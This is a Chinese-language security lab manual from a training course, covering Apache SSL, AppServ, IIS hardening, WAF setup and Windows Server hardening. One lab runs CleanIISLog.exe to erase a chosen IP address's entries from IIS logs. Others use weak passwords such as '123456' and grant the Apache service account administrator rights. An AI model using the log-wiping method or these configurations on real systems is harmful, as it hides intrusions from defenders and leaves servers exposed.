·你是否在使用ASP Session 变量来存储状态?Session 变量会很快地影响可测性。它们需要服务器资源,而且如果你想增加机器以扩展性能,它们会起阻碍作用,因为Session是与特定机器相关连的。无状态是最大化可扩展性的方法。关于Session的替代请参考这篇文章: HowTo: Persisting Values without Session.
·你是否在Session状态中存储有Visual Basic的组件?现在就去掉它们。Session中的Visual Basic对象会导致线程相关性而且会干扰打击IIS的线程池。这是一个复杂的主题,但是满足它的经验方法是:不要在Session中存储Single-threaded Apartment (STA) objects。如果你需要在Session中保留对象,它们应该被标记为”Both”,而且你需要自己聚合这些自由线程成为一个集合。Active Template Library (ATL)可以创建这样的怪物。
·你的网络程序是被限定运行在它自己的内存空间的吗?实际上我们推荐进程保护。然而,如果你需要榨出一些额外的性能,在进程中运行你的网络程序将会节省一些交叉进程集合的开销。
·当涉及Microsoft Transaction Server (MTS) components时,如果组件是作为服务器包而运行的而不是库包,那么将会有明显的性能区别。一个通常的建议是设置网络程序在它自己的内存空间中运行,然后在库包中运行MTS组件。
25、实验完成
3、分析和思考
1.压力测试的主要内容是什么。
实验8、典型安全通信协议的配置使用(Apache)
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=典型安全通信协议的配置使用(Apache).rar&type=attach
实验目标
- 通过网络层安全通信协议和传输层通信协议的配置,理解网络安全的层次概念。
预备知识
结合Apache的配置了解SSL协议的使用。
SSL协议的使用过程:
两者先各自向Boss申请证书,在每次进行通信时,先有客户端与服务器端商定一个 session Key ,然后以此session key进行会话(当然是以证书为基准的)。
1.SSL握手协议:通过截包软件Wireshark,可以截获通信数据包中,client hello的https数据包。
2.更改密码规格协议:过了一段时间后,需要商定一个新的session key?
3.SSL报警协议:即通过安全证书,SSL协议通信时,用户会得到安全通信协议的通知。
4.SSL记录协议:即记录整个加密传输过程,以便另一端解密使用
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以WindowsServer2003为例。)远程桌面连接,如下图所示。
2、远程登录,如下图所示
3、确认Apache没有安装,否则需要在“控制面板”→“添加或删除程序”中卸载原来的Apache2.0,再重新安装Apache2.0。
4、进入C:\tools\AHCJ160目录中,双击Apache+OpeSSL的整合安装包“httpd-2.0.64-win32-x86-openssl-0.9.8o.msi”安装Apache2.0。如下图所示。
5、双击安装包,进入安装界面,点击“Next”。如下图所示。
6、进入“LicenseAgreement”界面,选择“Iacceptthetermsinthelicenseagreement”,然后单击“Next”。如下图所示
7、进入ApacheHTTPServer介绍页面,点击“Next”。如下图所示。
8、进入服务器信息填写界面,填写好相关信息,点击下一步。如下图所示。
9、进入安装方式选择界面,选中“Typical”,点击“Next”。如下图所示。
8、进入安装路径设置界面。修改安装路径为“C:\”,若是没有该文件夹则新建,然后直接点击“Next”。如下图所示。
9、点击“install”进行安装。如下图所示。
10、点击“finish”完成安装。如下图所示。
11、单击“开始””→“管理工具”→“计算机管理”,进入计算机管理界面。如下图所示。
12、选择“本地用户和组”,右键单击“用户”以添加新用户Apache(此步是为了后面赋予Apache服务器对应的用户运行权限,确保Web访问者用指定的帐号访问服务器而不是本地用户或管理员帐号访问本地文件)。如下图所示。
13、设置用户名为“apache”,密码为“123456”。点击“创建”,然后关闭窗口。如下图所示。
14、右键点击刚刚创建的“apache”用户,在弹出的菜单中选择“属性”。依次点击“隶属于”→“添加”→“高级”→“立即查找”,双击搜索结果中的Administrators,然后依次确定,将apache隶属于“Administrators”。如下图所示。
15、单击“开始”→“管理工具”→“本地安全策略”。如下图所示。
16、选择“本地策略”→“用户权限分配”。在用户权限分配中选择“作为服务器登录”,如下图所示。
17、双击“作为服务器登录”项,点击“添加用户或组”按钮,点击“高级”→“立即查找”→“apache”→“确定”,添加apache用户。如下图所示。接着点击“确定”。
18、单击“开始”→“管理工具”→“服务”,停止Apache2的服务。如下图所示。
19、右键点击“Apache2”,选择“属性”,选择“登录”,将单选框从“本地帐户”切换到“此帐户”,点击“浏览”,点击“高级”→“立即查找”,选择“apache”用户,点击“确定”按钮,并填入密码123456。如下图所示。
20、找到Apache的安装目录(在本例中为C:\Apache2),右键apache2目录,单击“属性”→“安全”,点击“添加”按钮,再点击“高级”→“立即查找”,选择apache用户,点击“确定”按钮后,赋予apache用户对于apache安装目录的读取和写入的权利。然后“确定”按钮。如下图所示
21、进入C:\tools\AHCJ160目录中,右键点击“httpd-ssl.conf”文件,选择复制。如下图所示。
22、将文件拷贝到“C:\Apache2\conf”。如下图所示。
23、双击“httpd.default.conf”文件,在其中查找“#LoadModulessl_modulemodules/mod_ssl.so”一行,将前面的#注释去掉以打开SSL模块,然后保存。如下图所示。
24、双击“httpd.conf”文件,在文件中找到“Includeconf/ssl.conf”一行,并在其下面一行添加“Includeconf/httpd-ssl.conf”,然后保存。如下图所示。
26、在命令行输入命令“openssl.exegenrsa-outca.key1024”。如下图所示。此命令使用户生成CA证书中心自签所用的**对,其中“genrsa”用于生成RSA**对的OpenSSL命令。“-outca.key”令生成的**对保存到文件ca.key。“1024”是RSA模数位数,在一定程度上表征了**强度。
27、在命令行输入“openssl.exereq-new-x509-days365-keyca.key-outca.crt-config…\conf\openssl.cnf”。如下图所示。此命令为一步完成CA证书请求生成及签名,其中“req”用于生成证书请求的OpenSSL命令。“-new”生成一个新的证书请求。该参数将令OpenSSL在证书请求生成过程中要求用户填写一些相应的字段。“-x509”用于生成一份X.509证书。“-days365”命令是指从生成之时算起,证书时效为365天。“-keyca.key”指定ca.key为证书所使用的**对文件。“-outca.crt”令生成的证书保存到文件“ca.crt”。
35、键入命令“opensslreq-new-outserver.csr-keyserver.key-config…\conf\openssl.cnf”以进行Web服务器向证书服务器的签署申请。如下图所示。
36、输入相关信息生成签署文件server.csr。输入“cn”为“CountryName”,“Beijing”为“StateorProvinceName”,“Bejing”为“localityname”,“Anheng”为“OrganizationName”,“AHCJ160”为“OrganizationUnitName”,“Security”为“CommanName”,[email protected]为“EmailAddress”。与第28步中输入内容不同之处在“achallengepassword”以及“anoptionalname”处直接回车。如下图所示。
3、分析和思考
SSL协议是什么?
实验9、WEB服务器部署工具的使用
1、实验介绍
实验简介
- 实验所属系列:网络嗅探
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络嗅探
- 实验时数(学分):2学时
- 实验类别:实践实验类
实验目标
- 对服务器部署工具的掌握。
预备知识
FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:“下载”(Download)和"上传"(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上;"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。用Internet语言来说,用户可通过客户机程序向(从)远程主机上传(下载)文件。
传输方式:
FTP的传输有两种方式:ASCII、二进制。
ASCII传输方式
假定用户正在拷贝的文件包含的简单ASCII码文本,如果在远程机器上运行的不是UNIX,当文件传输时ftp通常会自动地调整文件的内容以便于把文件解释成另外那台计算机存储文本文件的格式。
但是常常有这样的情况,用户正在传输的文件包含的不是文本文件,它们可能是程序,数据库,字处理文件或者压缩文件。在拷贝任何非文本文件之前,用binary 命令告诉ftp逐字拷贝。
二进制传输模式
在二进制传输中,保存文件的位序,以便原始和拷贝的是逐位一一对应的。即使目的地机器上包含位序列的文件是没意义的。例如,macintosh以二进制方式传送可执行文件到Windows系统,在对方系统上,此文件不能执行。
如在ASCII方式下传输二进制文件,即使不需要也仍会转译。这会损坏数据。(ASCII方式一般假设每一字符的第一有效位无意义,因为ASCII字符组合不使用它。如果传输二进制文件,所有的位都是重要的。)
2、实验步骤
1、打开本地“远程桌面连接”工具,输入win2003_network_replace虚拟机的IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接,如下图所示。
远程登录,如下图所示。
2、打开“C:\tools\WEB服务器靶机部署”目录,找到AppServ的安装程序appserv-win32-2.4.6.exe。如下图所示。
3、打开appserv-win32-2.4.6安装程序。如果已经安装,则跳过安装步骤。
4、安装路径选择C:\appserv。如下图所示。
5、选择安装组件时将4个组件都选择安装,其中ApacheHTTPServer是开源的HTTP服务器,MySQLDatabase是开源的关系数据库,PHPHypertextPreprocessor是超文本预处理器,phpMyAdmin是一个以PHP为基础、以Web-Base方式架构在网站主机上的MySQL的数据库管理工具。如下图所示。
6、当对ApacheHTTPServerInformation服务器的信息进行配置时,其中ServerName为服务器的名称,本实例中使用localhost,也就是本地。因此在浏览器中使用Llcalhost就能访问本网站;AdministratorEmailAddress为管理员邮件地址,本实例中使用[email protected]作为管理员邮箱;ApacheHTTPPort为Apache提供HTTP服务的端口,本实例中使用默认的80端口,当客户端访问服务器时无需输入端口号就能访问服务器提供的服务。Apache的HTTPS的端口也是默认的443端口。其中HTTPS为安全的HTTP协议。如下图所示。
7、在MYSQL配置页面输入管理员root的密码12345678,如下图所示。
8、点击“install”,进行安装,如下图所示。
9、安装完成,如下图所示。
10、打开浏览器输入“http://127.0.0.1/phpinfo.php”,显示php版本号,则证明安装成功,如下图所示。
11、实验完成,关闭所有窗口和虚拟机。
3、分析和思考
1、FTP的工作模式有哪几种?
答案:
1、PORT方式和PASV方式。
实验10、IIS的安全设置
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
实验目标
- 了解iis基本的设置分为那几块,以及一些基本的设置。
预备知识
Internet Information Services(IIS,互联网信息服务),是由微软公司提供的基于运行Microsoft Windows的互联网基本服务,是一个World Wide Web server。IIS意味着能发布网页,并且有ASP(Active Server Pages)、JAVA、VBscript产生页面,有着一些扩展功能。停止IIS服务器上的服务以及在搭建网站后对其进行安全设置可以保证IIS服务器的安全。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
2、点击“开始”菜单,选择“管理工具”→“计算机管理”,打开“计算机管理”界面。如下图所示。
3、选择左侧“磁盘管理”,确认所有的分区都是NTFS的。如下图所示。
4、由于每开一个服务,该服务所对应得端口就会打开,端口数量越多,攻击者可能利用的攻击入口就可能越多。所以在IIS服务器端关闭没有必要打开的服务,能够为服务器进行安全加固。这里以FTP服务为例。点击“开始”菜单,选择“Internet(信息服务(IIS)管理器)”。如下图所示。
5、选择“Internet信息服务”栏下的“本地计算机”项,查看当前计算机IIS服务器上已安装的站点。右键“FTP站点”,停止其服务。如下图所示
6、在Internet(信息服务(IIS)管理器上创建网站并进行相应安全配置也可以增加IIS服务器的安全性。点击“开始”菜单,选择“Internet(信息服务(IIS)管理器)”,进入管理界面。如下图所示。
7、右键“网站”,点击“新建”→“网站”。如下图所示。
8、进入网站创建向导界面。如下图所示。
9、点击“下一步”,进入到网站创建描述界面。在描述内容输入框里可以写上对网站内容或类型的一个描述。如下图所示。
10、点击“下一步”,进入IP地址和端口设置界面。在网站IP地址输入框里填写本机的IP,设置默认端口为80。如下图所示。
11、点击“下一步”,进入网站主目录设置界面。单击“浏览”可以选择网站的主目录,这里设置为C:\website。勾选上“允许匿名访问网站”以允许匿名用户组的用户对网站进行访问。如下图所示。
12、点击“下一步”,进入网站访问权限设置界面。对于用户访问权限的设置,“读取”、“运行脚本(ASP)”两项必须勾选上,这样能保证用户能正常访问网站内容。如下图所示。
13、点击“下一步”→“完成”以完成网站的建立工作。如下图所示。
14、对于在搭建在IIS服务器上的网站,可以进行进一步的安全设置。点击“开始”菜单,选择“Internet(信息服务(IIS)管理器)”,进入管理界面。右键“网站”下创建好的“website”网站,选择“权限”。如下图所示。
15、进入权限设置界面,将Administrator的设置为完全控制。如下图所示。
16、点击“高级”→“权限”。根据自身需要,可以删除不必要的映射。如图下图所示。
17、右键点击“website”,选择“属性”。勾选“启用日志记录”选项。如下图所示。
18、点击“属性”。进入日志文件属性查看界面。选中“高级”,可以设置日志需要记录的项。如下图所示。
19、实验完成。
3、分析和思考
1.IIS的功能?
实验11、IIS架构动态网论坛系统
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=IIS架构动态网论坛系统.rar&type=attach
实验目标
- 使用IIS架设动态网论坛系统
预备知识
BBS的英文全称是Bulletin Board System,翻译为中文就是“电子布告栏系统”。BBS最早是用来公布股市价格等类信息的,当时BBS连文件传输的功能都没有,而且只能在苹果机上运行。早期的BBS与一般街头和校园内的公告板性质相同,只不过是通过来传播或获得消息而已。一直到开始普及之后,有些人尝试将苹果计算机上的BBS转移到个人计算机上,BBS才开始渐渐普及开来。由于爱好者们的努力,BBS的功能得到了很大的扩充。通过BBS系统可随时取得各种最新的信息;也可以通过BBS系统来和别人讨论计算机等等各种有趣的话题;还可以利用BBS系统来发布一些“征友”、“廉价转让”、“招聘人才”及“求职应聘”等启事;更可以召集亲朋好友到聊天室内高谈阔论。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
3、点击“开始”→“管理工具”→“Internet信息服务(IIS)管理器”。如下图所示。
4、进入“Internet信息服务(IIS)管理器”管理界面。如下图所示。
5、点击“本地计算机”,右键点击“网站”→“新建”→“网站”。如下图所示。
5、点击“本地计算机”,右键点击“网站”→“新建”→“网站”。如下图所示。6、进入网站创建向导界面,点击“下一步”。如下图所示。
9、进入“网站描述”界面。在描述栏输入“DVBBS”。点击“下一步”。如下图所示。
10、进入“IP地址和端口设置”界面,将网站IP地址指定为本机IP地址,端口默认设置为“80”,点击下一步。如下图所示。
11、 进 入 “ 网 站 主 目 录 ” 设 置 界 面 , 点 击 “ 浏 览 ” , 将 路 径 设 置 为“C:\tools\AHCJ163\Dvbbs8.2.0_Ac”,同时勾选“允许匿名访问网站”,点击“下一步”如下图所示。
13、进入“网站访问权限”设置界面,勾选“读取”和“运行脚本(如asp)”这两项以保证用户可以正常访问asp网站,点击“下一步”。如下图所示。
14、完成创建向导。单击“完成”按钮。如下图所示。
15、在IIS管理器管理界面,右键点击刚刚创建的网站“DVBBS”,点击“属性”→“主目录”以配置主目录。将“执行权限”设置为“纯脚本”。如下图所示。
16、因为在大多数的asp程序中都是以多级目录来存放文件。所以须要启用父路径来支持。点击“配置”→“选项”,勾选“启用父路径”。如下图所示。
18、IIS服务器提供了两种提示脚本错误的模式。“向客户端发送详细的asp错误消息”和“向客户端发送下列文本错误消息”。“向客户端发送详细的asp错误消息”模式应在web应用程序还需要修改的时候使用。“向客户端发送下列文本错误消息”是网站发布到因特网上为了安全的需要时使用。在应用程序配置中选择“调试”,勾选“向客户端发送详细的asp错误消息”(因为我们可能还需要修改web应用程序文件),然后点击“确定”。如下图所示。
19、返回“DVBBS”网站属性设置界面,点击“文档”。配置文档即配置网站首页,由于我们搭建的动网论坛的默认首页是“index.asp”,但是在IIS的默认首页里没有“index.asp”一项,所以需要我们手动添加一项。点击“添加”,在弹出的对话框中填入“index.asp”,点击“确定”。如下图所示。
23、打开ie浏览器,在地址栏中输入网站访问IP地址http://192.168.41.208,进入网站首页。网站搭建成功。如下图所示24、实验完成。
3、分析和思考
“向客户端发送详细的asp错误消息”是否有安全威胁?
2、为什么要启用父路径。
实验12、WAF (Web Application Firewall)防范一
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=WAF (Web Application Firewall)防范一.rar&type=attach
实验目标
- 了解常见WAF产品的功能和设置方法。
预备知识
Web应用防护系统(也称:网站应用级入侵防御系统,Web应用防火墙。英文:Web Application Firewall,简称: WAF),利用国际上公认的一种说法,是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
2、实验步骤
一、实验准备
1、登录WindowsXP(攻击机)和WindowsServer2003(靶机)打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样,但登录流程都是一样的,这里以WindowsServer2003为例。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示
(3)登录成功,如下图所示:
3、进入Windowsxp系统C:\Windows\System32\drivers\etc\hosts,将在WindowsServer2003搭建的网站,映射一下。本次实验中WindowsServer2003的IP地址为192.168.41.207(实验中,可能会有不同,请按实际获得的IP地址为准),如下图所示。
4、确认目标网站运行正常。右键点击桌面“我的电脑”图标,在弹出的菜单中选择“管理”,如图所示。
5、依次点击“服务和应用服务”→“Internet信息服务(IIS)”→“网站”,停止所有网站后,右键点击其中的“test”网站,在弹出的菜单中选择“启动”,如图所示。
6、在“test”网站上点击右键,在弹出的菜单中选择“浏览”,显示网站,如下图所示。
7、确认在WindowsServer2003中已经安装“威盾IIS防火墙”,若未安装,进入C:\tools\AHCJ164目录,打开其安装包进行安装。
二、使用WAF对目标网站进行防护1、进入威盾目录,打开weidun.ini文件,将protectdomain和adminhost设置为要保护的网站域名,本例中的域名是www.sql.com。改完后,进行保存。如下图所示。
2、开始前进入C:\tools\AHCJ164,双击“go.bat”。如下图所示。
3、重新启动iis进行重启。如下图所示。
4、单击桌面上的威盾图标,运行防火墙,可以看到当前防护模块的状态。(防火墙的启动项与未启用项是根据“防护选项”来设置的)如下图所示。
5、防护选项,可以开启相应的模块,并且设置可信ip和路径,即对添加的ip和文件或者文件目录不做过滤,也可以开启帮助提示或者日志功能。如下图所示。
6、开启所有选项后,在看防火墙状态,会看到所有模块已经开启了。如下图所示。
7、一般可以开启需要用的功能就行了,不需要用的就不用开,我们可以先开启禁用代理,防cc攻击,盗链保护,安全过滤来进行测试。如下图所示。
8、禁用代理选项-是对动态脚本进行保护的,比如常见的asp,sapx等,如果是客户端通过代理过来访问的,会直接返回错误页面,这样做主要是为了防止刷脚本类型的cc攻击。点击禁用代理。如下图所示。
实验12WAF (Web Application Firewall)防范一 创建实验环境
实验介绍
实验步骤
分析和思考
10
4、单击桌面上的威盾图标,运行防火墙,可以看到当前防护模块的状态。(防火墙的启动项与未启用项是根据“防护选项”来设置的)如下图所示。
5、防护选项,可以开启相应的模块,并且设置可信ip和路径,即对添加的ip和文件或者文件目录不做过滤,也可以开启帮助提示或者日志功能。如下图所示。6、开启所有选项后,在看防火墙状态,会看到所有模块已经开启了。如下图所示。
7、一般可以开启需要用的功能就行了,不需要用的就不用开,我们可以先开启禁用代理,防cc攻击,盗链保护,安全过滤来进行测试。如下图所示。
8、禁用代理选项-是对动态脚本进行保护的,比如常见的asp,sapx等,如果是客户端通过代理过来访问的,会直接返回错误页面,这样做主要是为了防止刷脚本类型的cc攻击。点击禁用代理。如下图所示。9、防护CC攻击选项,顾名思义,就是主要防CC攻击的,可以填写要保护的扩展名,防刷时间,允许搜索引擎抓取等,一般直接开启后,会生成一段cookie,正常访问网站的客户端有这段cookie,防火墙就会放行,因为攻击一般都是利用攻击工具来攻击的,没有这段cookie,开启该功能后,就能防御这种类型的攻击。如下图所示。
10、盗链保护模块主要是保护网站里的图片,音乐,电影等资源的,过多的外部盗链,会导致网站服务器带宽资源不够,所以要对这种流氓行为进行反击,不让外边的网站或者个人来盗链。一般直接添加相应的目录,比如图片目录/image/,然后把图片的扩展名,比如jpg,jpeg等填进去就可以了。如下图所示。
11、安全过滤模块主要是用来防御sql注入攻击和cookie欺骗攻击的。URL查询串过滤里有攻击常用的字符,比如’,and等,如果攻击者在URL里输入这些字符,防火墙就会直接进行屏蔽其ip,如下图所示。
12、我们在xp中可以做下测试,在URL里输入’和and,看有什么效果。如下图所示。
3、分析和思考
试举例防火墙的分类?
安全过滤模块主要有哪些功能?
实验13、WAF (Web Application Firewall)防范二
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=WAF (Web Application Firewall)防范二.rar&type=attach
实验目标
- 了解常见WAF产品的功能和设置方法。
预备知识
Web应用防护系统(也称:网站应用级入侵防御系统,Web应用防火墙。英文:Web Application Firewall,简称: WAF),利用国际上公认的一种说法,是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
2、实验步骤
1、登录WindowsXP(攻击机)和Windowsserver2003(靶机)打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样,但登录流程都是一样的,这里以WindowsServer2003为例。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示。
(3)登录成功,如下图所示:
2、确认目标网站运行正常。右键点击桌面“我的电脑”图标,在弹出的菜单中选择“管理”,如图所示。
3、依次点击“服务和应用服务”→“Internet信息服务(IIS)”→“网站”,停止所有网站后,右键点击其中的“article”网站,在弹出的菜单中选择“启动”,如图所示。
4、在“article”网站上点击右键,在弹出的菜单中选择“浏览”,显示网站,如下图所示。
11、网站哨兵模块可以伪装服务信息,设置允许的HTTP协议指令和版本,以及允许的最长url长度,可以防御URL变形攻击,如下图所示。
13、在XP里访问,就会提示提交较长的URL被拒,
14、IP黑名单,就是把一些明显具有恶意的IP直接添加到这里,防火墙就会直接屏蔽该类IP的访问,可以防御一些注入攻击的不停探测等,如下图所示。
3、分析和思考
线程限制的功能有哪些。
网站哨兵模块如何防御URL变形攻击。
实验14、使用工具清除IIS日志
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=使用工具清除IIS日志.rar&type=attach
实验目标
- 了解IIS日志文件清除的基本原理,掌握CleanIISLog.exe工具的使用方法和各项功能。通过使用CleanIISLog.exe工具清除本机上的IIS日志,掌握针对日志清除攻击的防御方法。
预备知识
IIS日志的一些基本介绍:
默认位置:%systemroot%system32logfiles可自由设置。
默认日志格式:ex+年份的末两位数字+月份+日期
文件后缀:.log
如2010年7月30日的日志生成文件是ex100730.log
IIS日志是每个服务器管理者都必须学会查看的,服务器的一些状况和访问IP的来源都会记录在IIS日志中,所以IIS日志对每个服务器管理者非常的重要,seoer也不例外,这点同时也可方便网站管理人员查看网站的运营情况。
2、实验步骤
一、实验准备
1、登录WindowsServer2003打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,请以实际的为准。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示。
3)登录成功,如下图所示。进入后右键任务栏,打开“任务管理器”,查看“性能”的CPU使用情况,若是CPU使用为100%,则点击“进程”,关闭占用90%以上CPU的进程然后再查看CPU使用情况,知道CPU使用正常。
二、使用工具清除IIS日志
1、通过“开始”→“所有程序”→“控制面板”切换到经典界面找到管理工具,打开IIS,如果没有该服务,则在控制面板,“添加或删除程序”界面。安装IIS,再继续实验。从“Internet信息服务”依次展开至“网站”→“默认网站”,然后右键单击选择“属性”,打开默认网站属性配置窗口,如下图所示。
说明:
IIS日志文件一般是存放于系统目录的logfiles目录,例如在WindowsXP以及Windows2003操作系统中,默认日志文件存放于“C:\WINDOWS\system32\Logfiles\”目录下,日志文件夹以“W3SVC”进行命名,如果有多个网站目录,则会存在多个“W3SVC”目录。
查看日志文件。如果在IIS配置中启用了日志记录,则用户在访问网站时,系统会自动记录IIS日志,并生成log文件。在本案例中直接打开“C:\WINDOWS\system32\Logfiles\W3SVC1\ex090910”日志文件,其中包含了用户访问的IP地址,访问的网站文件等信息。
3、测试CleanIISLog软件能否正常运行,进入C:\tools\AHCJ166\使用工具清除IIS日志目录中,将CleanIISLog复制到c盘根目录。
4、在“运行”中输入cmd启动DOS窗口,并输入两次“cd…”到CleanIISLog.exe软件所在目录C:下,然后输入“CleanIISLog”命令;如果运行正常则会给出一些帮助信息。
5、使用CleanIISLog.exe清除IIS日志
在DOS窗口中输入以下命令:CleanIISLogC:\WINDOWS\system32\Logfiles\W3SVC1\ex090910.log192.168.41.207其中“C:\WINDOWS\system32\Logfiles\W3SVC1\ex090910.log”为需要清除的日志文件,“192.168.41.207”为要清除的IP地址。执行成功后,会提示修改了多少处。如果是需要清除其他字符,则可以将IP地址更换为字符即可。
6、再次打开日志文件“ex/090910.log”,从中可以发现该日志中无“192.168.41.207”IP地址信息。
7、实验完成,关闭所有窗口和虚拟机。
3、分析和思考
1.分析一个IIS日志文件,总结其中内容。
2.日志文件对信息安全防御的作用。
实验15、Web服务安全配置实验
1、实验介绍
实验简介
- 实验所属系列:Web安全
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学
- 实验类别:实践实验类
实验目标
- 设置Windows Server 2003和IIS,使得WEB网站更加安全
预备知识
创建一个安全可靠的Web服务器,必须要实现操作系统和IIS的双重安全,因为IIS的用户同时也是Windows 2003用户,并且IIS目录的权限依赖Windows的NTFS文件系统的权限控制,所以保护IIS安全的第一步就是确保Windows 2003 操作系统的安全。实际上,保障Web服务器安全就是保障操作系统的安全。
2、实验步骤
一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)
远程桌面连接,如下图所示。
远程登录,如下图所示。
二、设置操作系统Windows Server 2003的安全性。
1、给Guest账户设置超复杂密码然后禁用。点击“开始”菜单,右击“我的电脑”,点击“管理”进入计算机管理界面。点击“系统工具”→“本地用户和组”→“用户”。如下图所示
2、右键选择“Guest”,选择“设置密码”。为了保险起见,最好给Guest加一个复杂的密码。打开记事本,在里面输入一串包含特殊字符、数字、字母的长字符串,然后把它作为Guest用户的密码拷贝进去。如下图所示。
出现设置密码提示,点击继续。如下图所示。
2、右键选择“Guest”,选择“设置密码”。为了保险起见,最好给Guest加一个复杂的密码。打开记事本,在里面输入一串包含特殊字符、数字、字母的长字符串,然后把它作为Guest用户的密码拷贝进去。如下图所示。出现设置密码提示,点击继续。如下图所示。密码设置成功。如下图所示。
3、禁用Guest账户。右键选择“Guest”,点击“属性”。如下图所示。
勾选“用户不能更改密码”、“密码永不过期”以及“账户已禁用”选项。如下图所示。
此时可以看到Guest账户已经被禁用。如下图所示。
4、给系统管理员账号“Administrator”改名。右键选择“Administrator”用户,点击“重命名”。如下图所示。因为Windows 2003Server操作系统中的系统管理员账号Administrator是不能被停用的,这意味着别人可以一遍又一遍地尝试这个用户的密码。所以需要尽量把它伪装成普通用户。
输入“Anheng”,此时Administrator超级管理员已经改名为“Anheng”。如下图所示。
5、创建一个陷阱用户。在用户管理界面,点击右键,选择“新用户”。如下图所示。“陷阱用户”即创建一个名为“Administrator”的本地用户,把它的权限设置成最低,并加上一个超过10位的超级复杂密码。
输入用户名“Administrator”,给Administrator设置一个超过10位的超级复杂的密码,点击“创建”。如下图所示。
此时在用户列表中可以看到常见的普通用户Administrator。如下图所示。
右键选择“Administrator”,点击“属性”,单击“隶属于”,可看到此用户隶属于User普通用户权限。如下图所示。
6、使用安全密码。一些公司的管理员创建账号的时候往往用公司名、计算机名做用户名,然后又把这些用户的密码设置得太简单,比如“welcome”等等。因此,要注意密码的复杂性,还要记住经常改密码。
点击“开始”→“管理工具”→“本地安全策略”,进入到本地安全策略管理界面。如下图所示。
选择“账户策略”→“密码策略”,“密码必须符合复杂性要求”一项默认为“禁用”。如下图所示。
右击选择“密码必须符合复杂性要求”,勾选“已启用”。点击“确定”。如下图所示。
选择“密码长度最小值”,默认值为0个字符。右击“密码长度最小值”,根据需要选择合适的密码字符个数,此处以10为例。如下图所示。
7、设置屏幕保护密码。设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。在桌面空白处,右击鼠标,选择“属性”,点击“屏幕保护程序”,勾选“在恢复时使用密码保护”。如下图所示。
8、开启系统审计功能。系统权限的设置在“本地安全策略”里的“审核策略”中。点击“开始”→“管理工具”→“本地安全策略”,进入到本地安全策略管理界面。如下图所示。
